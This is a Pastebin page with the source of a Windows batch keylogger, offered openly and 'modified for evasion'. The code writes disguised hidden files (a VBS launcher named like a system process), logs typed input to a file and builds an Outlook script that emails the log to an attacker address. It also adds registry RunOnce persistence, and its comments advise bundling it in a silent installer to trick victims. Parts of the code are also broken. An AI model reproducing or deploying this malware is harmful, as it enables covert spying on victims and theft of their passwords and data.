Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @echo off
- REM This is a windows batch source code of a simple keylogger
- REM It uses outlook to send you teh l0gz
- REM I don't know who wrote the original one, this is a modified version
- REM Modified version creates files with more plausible names
- REM All the other tweaks are minor and for evasion only
- REM 'Hideself' Advanced Extended Batch Command is used so the program will run in the background
- REM (if compiled with Advanced BAT To EXE Converter)
- REM It's currently FUD so just make a silent RAR SFX containing this and sth useful, like a legit installer
- REM modded by unknownAttacker
- rem Hideself
- set location = %windir%\System32\scvhost32.vbs
- echo set shell = CreateObject("Wscript.Shell") >> %location%
- echo shell.run "C:\windows\k.bat", 0 >> %location%
- echo @echo off >> C:\windows\k.bat
- echo color f7 >> C:\windows\k.bat
- echo :go >> C:\windows\k.bat
- echo echo .>>c:\log.txt >> C:\windows\k.bat
- echo echo : >> C:\windows\k.bat
- echo set /p keys= >> C:\windows\k.bat
- echo echo %keys% >> c:\log.txt >> C:\windows\k.bat
- echo goto go >> C:\windows\k.bat
- echo start %location% >> C:\windows\k.bat
- echo(
- echo Dim x > C:\config.vbs
- echo on error resume next >> C:\config.vbs
- echo Set fso =" Scripting.FileSystem.Object" >> C:\config.vbs
- echo Set so=CreateObject(fso) >> C:\config.vbs
- echo Set ol=CreateObject("Outlook.Application") >> C:\config.vbs
- echo Set out=WScript.CreateObject("Outlook.Application") >> C:\config.vbs
- echo Mail.to="u_a@hackermail.com">> C:\config.vbs
- echo Mail.Subject="Stuff" >> C:\config.vbs
- echo Mail.Body="l0gz have arrived" >> C:\config.vbs
- echo Mail.Attachments.Add("C:log.txt") >> C:\config.vbs
- echo Mail.Send >> C:\config.vbs
- echo Next >> C:\config.vbs
- echo ol.Quit >> C:\config.vbs
- C:\config.vbs
- )>>C:\Windows\k.bat
- ping localhost 5 > nul
- del C:\config.vbs
- REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v WinBoot /t REG_SZ /d %location%
- REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v WinBoot /t REG_SZ /d C:\Windows\k.bat
- attrib +h +s %location%
- attrib +h +s C:\Windows\k.bat
- attrib +h -r log.txt
- start %location%
Add Comment
Please, Sign In to add comment